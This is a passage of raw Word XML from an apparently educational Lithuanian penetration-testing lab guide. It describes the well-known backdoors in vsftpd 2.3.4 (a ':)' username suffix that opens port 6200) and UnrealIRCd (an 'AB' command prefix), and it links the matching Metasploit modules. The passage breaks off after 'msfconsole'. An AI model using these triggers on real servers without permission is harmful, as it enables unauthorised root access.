        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5AA5E06B" w14:textId="77777777" w:rsidR="006637C1" w:rsidRPr="00607DC0" w:rsidRDefault="006637C1"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289F45A2" w14:textId="77777777" w:rsidR="006637C1" w:rsidRPr="00607DC0" w:rsidRDefault="006637C1" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006637C1" w:rsidRPr="00607DC0" w14:paraId="2271DA4A" w14:textId="77777777" w:rsidTr="003C0B7F">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6FA46D81" w14:textId="77777777" w:rsidR="006637C1" w:rsidRPr="00607DC0" w:rsidRDefault="006637C1"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1209F111" w14:textId="77777777" w:rsidR="006637C1" w:rsidRPr="00607DC0" w:rsidRDefault="006637C1" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="73ED0338" w14:textId="66A170E7" w:rsidR="006637C1" w:rsidRPr="00607DC0" w:rsidRDefault="006637C1" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0945A48D"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5A754DF8" w14:textId="77777777" w:rsidR="006637C1" w:rsidRPr="00607DC0" w:rsidRDefault="006637C1" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CD5D51B" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>root@IP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="725D3689" w14:textId="531B6ED3" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CD6EE05" w14:textId="77777777" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="00B958F8"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B958F8" w:rsidRPr="00607DC0" w14:paraId="49194678"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7C75E4CB"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51D73BAD"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B958F8" w:rsidRPr="00607DC0" w14:paraId="5872F575" w14:textId="77777777" w:rsidTr="003C0B7F">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="69B155A3"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532F4B92" w14:textId="77777777" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="00B958F8" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B958F8" w:rsidRPr="00607DC0" w14:paraId="21806909" w14:textId="77777777" w:rsidTr="003C0B7F">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4D3F660A"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143A73FD" w14:textId="77777777" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="00B958F8" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5E777815" w14:textId="77777777" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="00B958F8" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FE22E69" w14:textId="77777777" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="00B958F8" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D021BC7" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc258656091"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Paslaugos: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Backdoors</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> (užpakalinės durys)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="2EEED132" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ADC2FA7" w14:textId="09342A4F" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>21 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> prieigą naudoja </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">, populiarus FTP serveris. Ypač šioje versijoje </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Backdoor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> (žr. </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="00607DC0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">), kuris buvo įkeltas į kodą nežinomų hakerių. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Backdoor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> buvo greitai nustatytas ir pašalintas, bet ne nemažai žmonių jį atsisiųsti su sistemų </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>atsinaujinimais</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Backdoor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> veikia, kaip užklausoje dėl </w:t>
      </w:r>
      <w:r w:rsidR="00876D9A" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>naudot</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">ojo prisijungimo yra naudojamas papildomas simbolis ":)" [laimingas veidas] pabaigoje. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Backdoor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> apkrėstoji versija atveria 6200 prieigą (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">). Mes galime tai įrodyti su </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>telnet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> ar naudotis </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> (žr. http://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor) pagrindų modulis automatiškai jį išnaudoti.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1CCDE6" w14:textId="0190051C" w:rsidR="00CC09C3" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D20BAFF" w14:textId="77777777" w:rsidR="00607DC0" w:rsidRDefault="00607DC0" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B0247F9"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5C44EB43" w14:textId="77777777" w:rsidR="00607DC0" w:rsidRDefault="00607DC0" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A57E4F1" w14:textId="77777777" w:rsidR="00607DC0" w:rsidRPr="00607DC0" w:rsidRDefault="00607DC0" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79F28323" w14:textId="77777777" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="00B958F8"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B958F8" w:rsidRPr="00607DC0" w14:paraId="3196E38B"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679DE20E"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2EF6152B"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B958F8" w:rsidRPr="00607DC0" w14:paraId="1BA4C1C7" w14:textId="77777777" w:rsidTr="003C0B7F">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="04A42BEF"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29361A89" w14:textId="77777777" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="00B958F8" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B958F8" w:rsidRPr="00607DC0" w14:paraId="4E58AD63" w14:textId="77777777" w:rsidTr="003C0B7F">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1AAAB820"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22666C62" w14:textId="77777777" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="00B958F8" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="12058CAD" w14:textId="77777777" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="00B958F8" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="481394D2" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>6667 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> prieigą naudoja </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>UnreaIRCD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> IRC paslauga (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>daemon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">). Ši versija yra su </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>backdoor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> (žr. </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="00607DC0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>http://forums.unrealircd.com/viewtopic.php?t=6562</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">). Pažeidžiamumas buvo nepastebėtas mėnesį laiko – trigeris buvo siunčiant laiškus "AB" į sistemos komandas naudojant bet kurią prieigą serveryje. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> turi modulį (žr. </w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidRPr="00607DC0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>http://www.rapid7.com/db/modules/exploit/unix/irc/unreal_ircd_3281_backdoor</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> ) išnaudoti šiam pažeidžiamumui.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324112D5" w14:textId="527492A8" w:rsidR="00CC09C3" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D2B1A62" w14:textId="77777777" w:rsidR="00607DC0" w:rsidRDefault="00607DC0" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E2B6954"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4B2A8C5F" w14:textId="77777777" w:rsidR="00607DC0" w:rsidRPr="00607DC0" w:rsidRDefault="00607DC0" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D9A2EC7" w14:textId="77777777" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="00B958F8"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B958F8" w:rsidRPr="00607DC0" w14:paraId="6AFDC072"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5F014A3A"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lastRenderedPageBreak/>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4F898D47"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B958F8" w:rsidRPr="00607DC0" w14:paraId="73664732" w14:textId="77777777" w:rsidTr="003C0B7F">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="23CCC595"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01C4BBD3" w14:textId="77777777" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="00B958F8" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B958F8" w:rsidRPr="00607DC0" w14:paraId="42D921F7" w14:textId="77777777" w:rsidTr="003C0B7F">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="35C63630"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1019A4EF" w14:textId="77777777" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="00B958F8" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1EF8E2F7" w14:textId="77777777" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="00B958F8" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="321DD5A7" w14:textId="77777777" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="00B958F8" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="057C475B" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Naudoti </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>telnet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> arba </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0BCA1699" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>root@linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">:~# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="62D1A952" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2059A268" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
